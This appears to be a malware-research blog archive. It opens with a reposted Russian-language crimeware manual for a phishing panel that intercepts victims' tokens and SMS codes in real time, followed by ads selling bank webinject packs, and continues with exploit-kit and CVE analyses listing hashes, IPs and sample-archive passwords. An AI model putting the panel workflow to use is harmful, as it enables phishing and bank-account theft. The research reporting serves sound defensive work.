в админке.Команд может быть много, но для этого в определенном месте в админке для каждой жертвы eсть список команд, которые можнозадать для данной страницы на которой он(жертвa) находится.[1 image here...not available at dump time]в нашем примитивном пример из PayPal в списке операции должнa присутствовать кнопка "показать рамочку".Если вы зашли на аккаунт с только что полученными данными и у вас выкидывает эту рамочку вы нажимаете кнопку "показать рамочку" для данной жертвой.И у нее на экране покажет такую же рамочку.Tooken, который будет введён в эту рамочку прилетит к вам на админ туда же где лежат username и пароль от этой жертвы.Думаю здесь все понятно.Единственное что хотел бы подчеркнуть то что жертва в любой момент может закрыть страницу закрыть компьютер вырубить сеть.В таком случае связь страницы с админкой теряется и задавать команды для данной страницы не имеет смысла.Для этого в нашей админке есть Tracker онлайн статуса который позволяет нам следить находится ли жертва онлайн или нет. [1 image here...not available at dump time]Теперь структура Tooken intercept админки.Первая страница это главная страница где показана текучка всех посетителей(жертв) ваших инжектов и фишингов.Напротив каждого посетителя есть кнопка O-Panel при нажатии на которую вы попадаете уже на индивидуальную панель операций для данного посетителя.[1 image here...not available at dump time] Именно здесь и находится список операций.Именно здесь крупным планом видно онлайн статус. Прошу заметить что онлайн статусов бывает 3(ONLINE, OFFLINE и WAITING).WAITING статус светится красным и светится только тогда когда жертва ждет операции от вас ,то есть только что вам был отправленпакет информации и страница ждет дальнейших инструкций!.[1 image here...not available at dump time]Также жертва с этим статусом мигает красным и на главной странице что поднимает их в таблице вверх. Окей давайте теперь возьмем реальный пример Phishing страницы скажем одного из нидерландских банков. тут реализованные как PCтак и мобильная версия.[1 image here...not available at dump time]Вы делаете рассылку на email и линки могут открываться на мобильном. в основном 50% так и происходит.Скажем кто-то(жертвa) переходит на Линк в вашем email и попадает на нашу страницу. Вы об этом узнаете сразу через Jabber Alert,в котором будет говориться про нового посетителя.Самое время открыть Universal панель. там вы увидите Новую колонку с информацией про посетителя а Конкретно его айпи ширина экрана и многое другое[1 image here...not available at dump time]с минуты на минуту к нам прилетят логины, их можно ждать как на главной так и на O-Panel.после того как Вы получили логины, Посетитель уходит в режим ожидания. об этом Вам будут говорить красные мигающие панели, она экранe у жертвы будет примерно такое[1 image here...not available at dump time]Что делать вам с полученным пакетом Логинов Решать только Вам. Но если у вас, находясь внутри в аккаунте, попросят ввести tooken, пароль, SMS пароль то самое время вернуться на O-Panel и нажать соответствующую команду. Команда которая приведет к тому что страница на которой находится жертва покажет ему запрос того что вам надо.[1 image here...not available at dump time]После того как жертва ввела в форму Tooken ,она снова уходит в режим ожидания, и Вы снова должны определиться что делать и какую команду ему дать. И так до бесконечности или пока жертва не Закроет страницу. Но если все-таки это надоест вам то у васесть два варианта распрощаться жертвой. это поставить блок [1 image here...not available at dump time]или перенаправить его на оригинал страницу.[1 image here...not available at dump time]При работе с одним посетителем могут стучать другие новые.Это будет отвлекать и все новые посетители будут ждать. чтобы этого избежать на главной странице есть ричашки которые контролируютрегистрацию новых посетителей и переадресацию старых поголовно. Если поставить регистрацию OFF ,то в админке только будут работать Те кто уже Там есть, все новые будут попадать на оригинал страницы контор.A если поставить редирект всех ,то все посетители(жертвы) кто есть в админке будут перенаправлены на свои оригинальные страницы поголовно.Это надо делать когда вы собрались к примеру уходить.------------------------------------------On april 2016 the 4th:------------------------------------------увжаемые друзьяновые инжекты под Андроид------------------------------------------On april 2016 the 11th:------------------------------------------Продается Пак инжектов под андроид для сбора карт.WhatsUpFacebookInstagramViberSkaypGooglePlayPrice:450$user posted imageОбезательно посмотрите видео. В инжектах реализованы Responsive & animations приемы.[Redacted]pass:1qaz------------------------------------------File mirrored here (pass : 1qaz)On april 2016 the 12th:------------------------------------------Pack of Injects for Columbia banks for sale.Credit cards colectors with admin panel on https domen.bancofalabellarbmcolombiacolpatriabancolombiabbvanetbancodeoccidentebancodebogotabancopichinchaPrice:800$[3 images here...not available at dump time]Video: [Redacted]Pass:columbia ------------------------------------------File mirrored here  (pass: columbia)On april 2016 the 14th:------------------------------------------Pack of Injects for Canada banks for sale.Credit cards colectors with admin panel on https domen.TdCibcBmoDesjRbcPrice:500$[3 images here...not available at dump time]Video: [Redacted]Pass:canada ------------------------------------------File mirrored here (pass: canada)On april 2016 the 18th:------------------------------------------Недавно вышел апдейт на U-admin(Universal Admin).Теперь все более соответствует написанному выше описанием.Админ панель теперь имеют специальную директорию под plugins, и все плагины в этой директории автоматически прописывается в админке.[1 image here...not available at dump time]Например, вы приобрели U-admin а потом "Log parser Plugin". Для этого вам просто надо поставить папку Log parser в плагин директорию в админке.Также был разработан VNC плагин который дает возможность коннектится к вашему botnet API с запросом на соединение по VNC/SOCKS для определенного бота.Этот плагин является дополнением к "Tooken Intercept" плагина про который я писал вам выше. Если вы используете "Tooken Intercept" с инжектороми в вашем боте есть в VNC, и в админке вашего Бота есть API управление VNC то при наличии VLC plugin в U-admin возможно сделать запрос на соединение по vnc или socks с ботом.Как правило это делается автоматически при самом первом соединение с инжектоm,то есть когда жертва заходит на страницу перехвата.В связи с этим была слегка переделана O-Panel где в команды была добавлена новая опция проверки статуса VNC/SOCKS соединение.[1 image here...not available at dump time]Куда ,как вы видите, при успешном соединении выводятся данные на VNC/SOCKS------------------------------------------File Tree from some components :Folder PATH listingUADMIN_|   cp.php|   head.php|   index.php|   login.php|   session.php|  +---files|   |   animate.css|   |   bootbox.min.js|   |   bootstrap-notify.min.js|   |   bootstrap-social.css|   |   hover-min.css|   |   index.php|   |   jquery-ui.css|   |   jquery-ui.min.js|   |   jquery.js|   |   my.css|   |  |   +---bootstrap|   |   +---css|   |   |       bootstrap-theme.css|   |   |       bootstrap-theme.css.map|   |   |       bootstrap-theme.min.css|   |   |       bootstrap-theme.min.css.map|   |   |       bootstrap.css|   |   |       bootstrap.css.map|   |   |       bootstrap.min.css|   |   |       bootstrap.min.css.map|   |   |      |   |   +---fonts|   |   |       glyphicons-halflings-regular.eot|   |   |       glyphicons-halflings-regular.svg|   |   |       glyphicons-halflings-regular.ttf|   |   |       glyphicons-halflings-regular.woff|   |   |       glyphicons-halflings-regular.woff2|   |   |      |   |   +---js|   |   |       bootstrap.js|   |   |       bootstrap.min.js|   |   |       npm.js|   |   |      |   |   \---switch|   |           bootstrap-switch.min.css|   |           bootstrap-switch.min.js|   |          |   +---dt|   |       dataTables.bootstrap.min.css|   |       dataTables.bootstrap.min.js|   |       jquery.dataTables.min.js|   |      |   \---images|           ui-icons_444444_256x240.png|           ui-icons_555555_256x240.png|           ui-icons_777620_256x240.png|           ui-icons_777777_256x240.png|           ui-icons_cc0000_256x240.png|           ui-icons_ffffff_256x240.png|          +---opt|       geo_switch.txt|       index.php|       theme.txt|      +---plugins|   +---intercept|   |   |   bc.php|   |   |   class.jabber.php|   |   |   dynamic__part.php|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |   panel.php|   |   |   text.php|   |   |  |   |   +---ajax|   |   |       cp_ajax.php|   |   |       index.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   index.php|   |   |   |   jquery-ui.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   |       bootstrap-theme.css.map|   |   |   |   |       bootstrap-theme.min.css|   |   |   |   |       bootstrap-theme.min.css.map|   |   |   |   |       bootstrap.css|   |   |   |   |       bootstrap.css.map|   |   |   |   |       bootstrap.min.css|   |   |   |   |       bootstrap.min.css.map|   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   +---dt|   |   |   |       dataTables.bootstrap.min.css|   |   |   |       dataTables.bootstrap.min.js|   |   |   |       jquery.dataTables.min.js|   |   |   |      |   |   |   \---images|   |   |           ui-icons_444444_256x240.png|   |   |           ui-icons_555555_256x240.png|   |   |           ui-icons_777620_256x240.png|   |   |           ui-icons_777777_256x240.png|   |   |           ui-icons_cc0000_256x240.png|   |   |           ui-icons_ffffff_256x240.png|   |   |          |   |   \---public|   |           .ht.db|   |           index.php|   |           Removed.txt|   |          |   +---log_parser|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   +---ajax|   |   |       server_side.php|   |   |       ssp.class.php|   |   |      |   |   +---classes|   |   |       browser.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   |       bootstrap-theme.css.map|   |   |   |   |       bootstrap-theme.min.css|   |   |   |   |       bootstrap-theme.min.css.map|   |   |   |   |       bootstrap.css|   |   |   |   |       bootstrap.css.map|   |   |   |   |       bootstrap.min.css|   |   |   |   |       bootstrap.min.css.map|   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   \---dt|   |   |           dataTables.bootstrap.min.css|   |   |           dataTables.bootstrap.min.js|   |   |           jquery.dataTables.min.js|   |   |          |   |   \---public|   |           .htBd.db|   |           geo_switch.txt|   |           index.php|   |           theme.txt|   |          |   +---settings|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           cfg.php|   |           index.php|   |          |   +---style|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           index.php|   |          |   \---text|       |   functions.php|       |   main.php|       |   text.php|       |  |       \---public|               index.php|               texts.txt|              \---scrNote: If you are interested by the [Redacted] part please send a mail

Simulacra & Simulation - Jean BaudrillardFeatured in MatrixBedep could be described as a fileless loader with a resident module that can optionally perform AdFraud. It's intimate to Angler EK and appeared around August 2014. On the 2016-03-24 I noticed several move in Bedep. Angler infecting a VM and integrating it into an instance of Bedep botnet2016-03-24No more variable in the URI (as several month before), the protocol Key changed and in most of my manual checks, all threads were sending a strange payload in the first stream.2ko size for Win7 64bits :80eb8a6aba5e6e70fb6c4032242e9ae82ce305d656b4ed8b629b24e1df0aef9aPopup shown by the first payload from Bedep Stream - Win7(in the background Angler Landing)48ko size for WinXP 32bits:a0fe4139133ddb62e6db8608696ecdaf5ea6ca79b5e049371a93a83cbcc8e780Popup shown by the first payload from Bedep Stream - WinXPLooking at my traffic I thought for some time that one of the Bedep instances was split in two.Then I understood that I got different result on my "manually" driven VM (on VMWare ESXi) and my automated Cuckoo driven one ( on VirtualBox). I suspected it was related to hardening, as this is one of the main difference between those two systems.And I got confirmation. Here is an example on a GooNky ([1] [2] [3]) malvertising traffic in Australia :A VM not hardened enough against Bedep got redirected to a "decoy" instance of Bedep that i will refer as :Bedep "Robot Town" - 2016-04-12Now look what i get instead with a VM that is not spotted as is:Same Angler thread - VM not detected. 1st Stream get Vawtrak2016-04-12( Vawtrak in that stream   d24674f2f9879ee9cec3eeb49185d4ea6bf555d150b4e840407051192eda1d61 )I am not skilled enough to give you the list of checks Bedep is doing. But here is one of them spotted by Cuckoo :Bedep doing some ACPI checksI think there are multiple level of checks. Some resulting in Bedep not trying to contact the C&C, some where the positive check end up with a different seed for the Bedep DGA redirecting spotted machines in a dedicated instance. This is quite powerful :- the checks are made without dropping an executable. - if you don't know what to expect it's quite difficult to figure out that you have been trapped- there is a lot of things that operators can do with this list of known bots and initial Bedep thread ID. One of them is for instance knowing which of the infection path are researcher/bots "highway" :Illustration for Bedep "Robot Town" from an "infection path" focused point of viewThis could be just a move to perform different tasks (AdFraud only (?) ) on VMs, but my guess it that this Bedep evolution on 2016-03-24 is a fast reaction to this Proofpoint Blog from 2016-03-18 which  show how Bedep threads are additional connectable dots. Sharing publicly is often a difficult decision. The question is which side will benefits the most from it, in the long time.For researchers:In the last 3 weeks, if your VM have communicated with :95.211.205.228 (which is a Bedep ip from end of 2015 reused) || ( 85.25.41.95  && http.uri.path  "ads.php?sid=1901" ) and you are interested by the "real payload" then you might want to give PAfish a run.Marvin - Paranoid AndroidOn the other hand, any of your VM which has communicated with 104.193.252.245 (Bedep "standard" 18xx 19xx instance)  since the 24 of March is hardened enough to grab the real payload.[Edits]- Removed the AU focused mention on the Vawtrak. I have been told (Thanks ! ) it's US focused. Got geo Glitched. Maybe more about that a day or the other.- Refine the check conditions for Researcher. IP  85.25.41.95 and sid=1901...otherwise...ok :)[/Edits]Acknowledgements :Thanks Will Metcalf and Malc0de for the discussions and help on this topic--I'm sorry, but I must do it...Greetings to Angler and Bedep guys. 😉 You are keeping us busy...and awake !Reading :Video Malvertising Bringing New Risks to High-Profile Sites - 2016-03-18 - ProofpointBedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schwarz - ArborSertAngler EK : now capable of "fileless" infection (memory malware) - 2014-08-30Modifying VirtualBox settings for malware analysis - 2012-08-23  - Mikael Keri

Spotted in a "degraded" version on the 2016-04-02 in Magnitude, live also since 2016-03-31 in Nuclear Pack, Adobe was really fast at fixing  this vulnerability with the patch released on the 2016-04-07 bringing Flash Player to version 21.0.0.213It's not the first time a "0day" exploit is being used in a "degraded" state.This happened before with Angler and CVE-2015-0310 and CVE-2014-8439You'll find more details about the finding on that Proofpoint blog here :"Killing a zero-day in the egg: Adobe CVE-2016-1019"and on that FireEye blog here:CVE-2016-1019: A new flash exploit included in Magnitude Exploit KitNote : we worked with Eset, Kaspersky and Microsoft as well on this case.Nuclear Pack :2016-03-31 "Degraded"Identification by  Eset, Kaspersky and FireEye (Thanks)Exploit sent to Flash Player 20.0.0.306 by Nuclear Pack on the 2016-03-31CVE-2016-1019 insideSample in that pass:  301f163644a525155d5e8fe643b07dceac19014620a362d6db4dded65d9cad90Out of topic example of payload dropped that day by that instance of Nuclear : 42904b23cff35cc3b87045f21f82ba8b (locky)Note the string "CVE-2016-1001" in the Nuclear Pack, explaining why maybe this exploit is being used in a degraded state.CVE-2016-1001 string spotted by Denis O'Brien (Malwageddon), the 2016-04-05 in Nuclear Pack exploitMagnitude :2016-04-02 "Degraded" to 20.0.0.306Identified as is by FireEye[2016-04-07: TrendMicro told me they found some hits for this exploit in Magnitude back from 2016-03-31 as well]Magnitude exploiting Flash 20.0.0.306 with CVE-2016-1019 the 2016-04-02 in the morning.Payload is Cerber.Side note : the check on the redirector in front of Magnitude ( http://pastebin.com/raw/gfEz25fa ) which might have been fixed with the CVE-2015-2413 was in Magnitude landing itself from September to end of November 2015.res:// onload check features unobfuscated at that time in Magnitude Landing 2015-09-29Sample in that pass: 0a664526d00493d711ee93662a693eb724ffece3cd68c85df75e1b6757febde5Out of topic payload: 9d92fb315830ba69162bb7c39c45b219cb8399dd4e2ca00a1e21a5457f92fb3c Cerber RansomwareNote: I got successful pass with Windows 8.1 and Flash 20.0.0.272 as well and Windows 10 build 1511 (feb 2016) via Flash 20.0.0.306 on Internet Explorer 11. Edge seems not being served a landing.Neutrino:2016-04-11 - "degraded" as well it seems. (at least didn't got it to work on Flash 21.x)CVE id by @binjo and Anton Ivanov (Kaspersky)Neutrino successfully exploit Flash 20.0.0.306 with CVE-2016-10192016-04-11Fiddler : Sent to vtOut of topic payload: 83de3f72cc44215539a23d1408c140ae325b05f77f2528dbad375e975c18b82e Reading :Killing a zero day in the egg : CVE-2016-1019 - 2016-04-07 - ProofpointCVE-2016-1019: A new flash exploit included in Magnitude Exploit Kit - 2016-04-07 -  Genwei Jiang - FireEyeZero-Day Attack Discovered in Magnitude Exploit Kit Targeting CVE-2016-1019 in Older Versions of Adobe Flash Player - 2016-04-07 - Peter Pi, Brooks Li and Joseph C. Chen - TrendMicro

Two weeks after Flash patch,  two months after last Flash exploit integration in Angler, on the 2016-03-25 Angler EK, in some threads, is starting to send an exploit to Flash Player 20.0.0.270 and 20.0.0.306I tried multiple configuration but I was not able to get exploited. The following day I got successful infections with Flash 20.0.0.270 and 20.0.0.306.Angler EK :2016-03-25The CVE here has been identificated as CVE-2016-1001 by Eset and Kaspersky (Thanks)2016-03-26 - Angler EK successfully exploiting Flash 20.0.0.306 in Internet Explorer 11 on Windows 7Fiddler sent to VT here.Hash of the associated SWF fwiw : b609ece7b9f4977bed792421b33b15daObserved as well : ab24d05f731caa4c87055af050f26917 - c4c59f454e53f1e45858e95e25f64d07NB : this is just "one" pass.  Angler EK can be used to spread whatever its customers want to spread .Selected examples I saw in the last 4 days : Teslacrypt (ID 20, 40,52, 74 ,47) , Locky (affid 14 - 7f2b678398a93cac285312354ce7d2b7  and affid 11 - f417b107339b79a49e4e63e116e84a32), GootKit b9bec4a5811c6aff6001efa357f1f99c, Vawtrak  0dc4d5370bc4b0c8333b9512d686946cRamnit 99f21ba5b02b3085c683ea831d79dc79Gozi ISFB (DGA nasa) 11d515c2a2135ca00398b88eebbf9299BandarChor, (several instances, ex f97395004053aa28cadc6d4dc7fc0464 - 3c9b5868b4121a2d48b980a81dda8569 )Graybird/LatentBot f985b38f5e8bd1dfb3767cfea89ca776Dridex - b0f34f62f49b9c40e2558c1fa17523b5 (this one was 10 days ago..but worth a mention)Andromeda (several instances)and obviously many Bedep threads and their stream of PE (evotob, reactorbot (several instances), Tofsee, Teslacrypt,Kovter, Miuref)Edit 1: 2016-03-29 -  I was mentioning 2016-1010 as a candidate but it's not. Modified with the correct CVE ID provided by Eset and Kaspersky..

Fixed with the January 2016 Microsoft patches, CVE-2016-0034  ( MS16-006 ) is a Silverlight Memory Corruption vulnerability and it has been spotted by Kaspersky with rules to hunt Vitaliy Toropov’s unknown Silverlight exploit mentioned in HackingTeam leak.Angler EK :On the 2016-02-18 the landing of Angler changed slightly to integrate this piece of code :Silverlight integration Snipet from Angler Landing after decoding2016-02-18resulting in a new call if silverlight is installed on the computer:Angler EK replying without body to silverlight callHere a Pass in great britain dropping Vawtrak via Bedep buildid 77862016-02-18I tried all instances i could find and the same behavior occured on all.2016-02-22 Here we go : call are not empty anymore.Angler EK dropping  Teslacrypt via silverlight  5.1.41105.0 after the "EITest" redirect 2016-02-22I made a pass with Silverlight : 5.1.41212.0 : safe.Edit1 : I received confirmation that it's indeed CVE-2016-0034 from multiple analyst including Anton Ivanov (Kaspersky). Thanks !Xap file : 01ce22f87227f869b7978dc5fe625e16Dll : 22a9f342eb367ea9b00508adb738d858Out of topic payload : 6a01421a9bd82f02051ce6a4ea4e2edc (Teslacrypt)Fiddler sent hereRIG : 2016-03-29Malc0de spotted modification in the Rig landing indicating integration of Silverlight Exploit.Here is a pass where the Silverlight is being fired and successfully exploited. CVE identification by : Anton Ivanov (Kaspersky)RIG - CVE-2016-0034 - 2016-03-29Xap file in that pass :  acb74c05a1b0f97cc1a45661ea72a67a080b77f8eb9849ca440037a077461f6bcontaining this dll : e535cf04335e92587f640432d4ec3838b4605cd7e3864cfba2db94baae060415( Out of topic payload : Qbot 3242561cc9bb3e131e0738078e2e44886df307035f3be0bd3defbbc631e34c80 )Files : Fiddler and sample (password is malware)Reading :The Mysterious Case of CVE-2016-0034: the hunt for a Microsoft Silverlight 0-day - 2016-01-13 - Costin Raiu & Anton Ivanov - KasperskyPost Publication Reading:(PDF) Analysis of Angler's new silverlight Exploit - 2016-03-10 - Bitdefender Labs

Lately I received multiple questions about connection between Reveton and Cryptowall.I decided to have a look.A search in ET Intelligence portal at domains from Yonathan's Cryptowall TrackerET Intelligence search on Specspa .comshow that the first sample ET has talking with it is :e2f4bb542ea47e8928be877bb442df1b  2013-10-20A look at the http connexion shows the "us.bin" call mentioned by Yonathan (btw the us.bin item is still live there)ET Intelligence  : e2f4bb542ea47e8928be877bb442df1b http connexionsET Intelligence : Associated alert pointing at Cryptowall.A look into VirusTotal Intelligence shows that this sample is available in a Pcap captured and shared by ThreatGlass :NSFW://www.threatglass .com/malicious_urls/sunporno-comHiman EK dropping Cryptowall 2013-10-20captured by ThreatGlassWith the same referer and in the same Exploit Kit i got dropped 20 days earlier Flimrans :(See : http://malware.dontneedcoffee.com/2013/10/HiMan.html )Flimrans disappeared soon after this post from 2013-10-08 about the affiliate :http://malware.dontneedcoffee.com/2013/10/flimrans-affiliate-borracho.htmlInterestingly Flimrans is showing in US the same Design from Reveton pointed by Yonathan :Flimrans US 2013-10-03What is worth mentioning is that Flimrans was the only ransomware (i am aware of) to show a Spanish version of this same design :Flimrans ES 2013-10-03The timeline is also inline with a link between those two Ransomware (whereas Reveton was still being distributed months after these events).Digging into my notes/fiddlers i even found that this bworldonline .com which is still hosting the us.bin was in fact also the redirector to HiMan dropping Flimrans 20 days earlier from same sunporno upper.[The credits goes to Eoin Miller who at that time pointed that infection path allowing me to replay it]The compromised server storing the first design Blob used by cryptowallused to redirect 20 days earlier to Himan dropping Flimrans (which is using that same design).So...Cryptowall son of Borracho? I don't know for sure...but that could to be a possibility.Files : Items mentionned here. (password is malware)Read More:HiMan Exploit Kit. Say Hi to one more - 2013-10-02Flimrans Affiliate : Borracho - 2013-10-08

While other exploit kit are struggling to keep up with Angler (none is firing CVE-2015-8446 , maybe because of the Diffie-Hellman protection on Angler's exploits ),- Nuclear / Magnitude and Neutrino last exploits are from October (CVE-2015-7645)- RIG and Sundown are relying on July exploits (Hacking Team's one - CVE-2015-5122)( all have the IE CVE-2015-2419 from august)Angler has just integrated CVE-2015-8651 patched with Flash 20.0.0.270 on 2015-12-28Angler EK : 2016-01-25The exploit might be here since the 22 based on some headers modification which appeared that day.It's not yet pushed in all Angler EK threads but widely spread.Thanks Anton Ivanov (Kaspersky) for CVE Identification !CVE-2015-8651 (and CVE-2015-2419) being successfully exploited by Angler EK to load bedep in memory2016-01-25Fiddler sent to VT.---Another pass via the "noisy" Cryptowall "crypt13x" actor which threads also has it :CVE-2015-8651 being successfully exploited by Angler EK to load Cryptowall  (crypt13001)from the widely spread and covered "crypt13x" actor thread - 2016-01-25(Out of Topic payload : 5866906a303b387b9918a8d7f8b08a51 Cryptowall crypt13001 )I have been told by Eset that the exploit is successful on Flash 20.0.0.235 and Firefox.---I spotted a thread serving a landing and an exploit to Firefox.2016-03-23 Firefox pass with Sandbox escape :Angler EK exploiting CVE-2015-8651 on Firefox 33.1.1 and Flash 20.0.0.305Bedep successfully wrote its payload on the drive.2016-03-23Files : Fiddler in a zip (password malware)Neutrino :Thanks Eset for identifying the added CVE here.Neutrino Exploiting CVE-2015-8651 on 2016-02-09Here Bunitu droppedNote: For some reason couldn't have it working with Flash 20.0.0.228.Files : Fiddler here (password is malware)Nuclear Pack:Thanks again Eset for CVE identification here.Nuclear Pack exploit CVE-2015-8651 on 2016-02-10Out of topic payload: cdb0447019fecad3a949dd248d7ae30f which is a loader for CloudScout (topflix .info - which we can find in RIG as well those days)It seems Chrome won't save you if you do let it update.2016-02-17 on DE/US/FR trafficThis is not something i can reproduce.Is what i get with Chrome 46.0.2490.71 and its builtin 19.0.0.207 (which should fast update itself to last version)Files : Fiddler here (password: malware)Magnitude:2016-02-18CVE ID confirmed by Anton Ivanov (Kaspersky)Magnitude dropping Cryptowall via CVE-2015-86512016-02-18Files : Fiddler here (Password is malware)RIG :Some days before 2016-04-06Thanks FireEye for CVE identification.CVE-2015-8651 successfuly exploited by RIG on 2016-04-07Sample in that pass: 4888cc96a390e2970015c9c1d0206011a6fd8e452063863e5e054b3776deae02( Out of topic payload: 30cb7ed7a67eb08fa2845990b7270d64d51e769d6e0dad4f9c2b8e7551bced0a Probably Godzilla downloader)Files : RIG_2016-04-07 (swf, payload and Fiddler - password is malware)Read More:(GoogleTranslate - via @eromang ) Offshore "Dark Hotel" organization of domestic business executives launched APT attacks - 2015-12-31 - ThreatBookPost publication reading :An Analysis on the Principle of CVE-2015-8651 - Antiy Labs - 2016-01-26

Snipshot of MonterAV AffiliateAs I got many questions about an EK named XXX (that is said to be better than Angler 😉 ) I decided to share some data here.XXX Control Panel Login Page.XXX is Angler EK ( it's the real name of its most documented instance at least)Angler EK / XXX  IE sploit only Stats on 2015-07-25(for some reason Flash Exploits were not activated on that thread)Note the Chase Logo >> JPMorgan  >>  Cool EK's Exploit Buyer ;)You might want to read "The Transition - "Reveton Team" or "Mr.J/Monster AV" from :Paunch's arrest...The end of an Era ! (2013-10-11) . This is where I first wrote the defense chosen name for this Exploit Kit. The name is chosen after a logo from the Reveton Affiliate.Snipshot of "The Transition" after Paunch's ArrestBut Angler was around before the Reveton team started to use it.Here is one used against Ukrainian that i captured  in August 20132013-08-27 - Exploit Kit unknown to me at that timeAncestor of Angler EK as we know it[Payload here is most probably Lurk]when Reveton Team was still on Cool EK. It appears that instance had already Fileless capabilities.A Russian researcher friend connect that instance back to this Securelist post from 2012-03-16 : A unique ‘bodiless’ bot attacks news site visitorsSo the (c) 2010 at the bottom of the control panel is probably...the real birth year of Angler.This indexm.html variant of Angler EK is most probably still being used in RU/UA and was one of the early adopter of CVE-2015-0311 (a flash 0day from January) before many "standard" instances of Angler. There was still java exploit inside in march2015-01-27 - Angler EK "indexm" exploiting CVE-2015-2551 and firing Java exploits[Payload here is most probably Lurk]Angler EK has been briefly mentioned (translation here ) as part of a "partnerka" by a user using Menatep as Nickname in February 2014Conclusion : xxx is what we call Angler EK and Angler EK (indexm instance) is not that young!Files : 2 Fiddler pass of Angler EK "indexm" from 2013 and 2015 (Password : malware)Read More :Police Locker land on Android Devices - 2014-05-04Paunch's arrest...The end of an Era ! - 2013-10-11Crimeware Author Funds Exploit Buying Spree - 2013-01-07 - KrebsOnSecurityCool Exploit Kit - A new Browser Exploit Pack on the Battlefield with a "Duqu" like font drop - 2012-10-09A unique ‘bodiless’ bot attacks news site visitors - 2012-03-16 - Sergey Golovanov - SecurelistPost publication Reading :Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC News [Cf Lurk]Is it the End of Angler ? - 2016-06-11How we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

One week after patch Flash 19.0.0.245 is being exploited by Angler EK via CVE-2015-8446Angler EK :2015-12-14CVE identification by Anton Ivanov ( Kaspersky ) and FireEye  (Thanks !)Angler EK exploiting Flash 19.0.0.245 via CVE-2015-84462015-12-14Sample in that pass : b5920eef8a3e193e0fc492c603a30aafSample from other Angler EK instance : 0615fb9e037b7bf717cc9b04708e51da 720089b93a0f2bb2a72f1166430de522Fiddler sent to VT.(Not replayable. You know how to contact me to land on live instances. I might not reply to mail coming from gmail,live,yahoo etc...  mailboxes)Out of topic : in that pass Bedep BuildID 5004 is loaded in Memory and is then grabbing those 2 dll in a streamf5c1a676166fe3472e6c993faee42b34d65f155381d26f8ddfa304c83b1ad95a (Credential Stealer)and after that performing AdfraudCVE-2015-8446 in Angler EK - malicious mp3 is stored in encrypted JSON (same schema as in CVE-2015-5560). pic.twitter.com/FCyvP43Q0X— Anton Ivanov (@antonivanovm) December 17, 2015 Last safe version of Flash against commercial exploit kit  was 19.0.0.226 fixing CVE-2015-7645Post publication readings :(Google Translate) Angler EK latest CVE-2015-8446 Flash Exploit analysis - 2015-12-19 - Qihoo360

Yesterday's Nymaim spam campaign was also redirecting to Nuclear Pack.Without big surprise the sample ( 592899e0eb3c06fb9fda59d03e4b5b53 ) dropped by Nuclear is the same as the fake update proposed.But there was an additionnal 11kb payload call for which i could not find sample on driveNuclear Pack dropping Nymaim in the 2015-11-30 Spam CampaignIt was also unusually encoded with two XOR pass and first part of the decoded stream is a Shellcode.Friends (who don't want to be mentioned) figured a privilege escalation was in use there :According to Kaspersky and Timo Hirvonen (F-Secure) it's CVE-2014-4113 ( Win32k.sys Elevation of Privilege Vulnerability )I did not got to see the privilege escalation in live condition.Note: it's not the first time a public Exploit Kit is integrating an exploit to escalates right on dropped payload (Cf CVE-2015-2426 in Magnitude )Files : Fiddler and Dll here (password is malware - XOR key : 56774347426F664767  then  213404052d09212031)Thanks : Kaspersky,  Timo Hirvonen , Malc0de and 2 other friends for taking some time and use their wizardness  on this.Read More :An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) - 2014-10-29 - TrendMicro

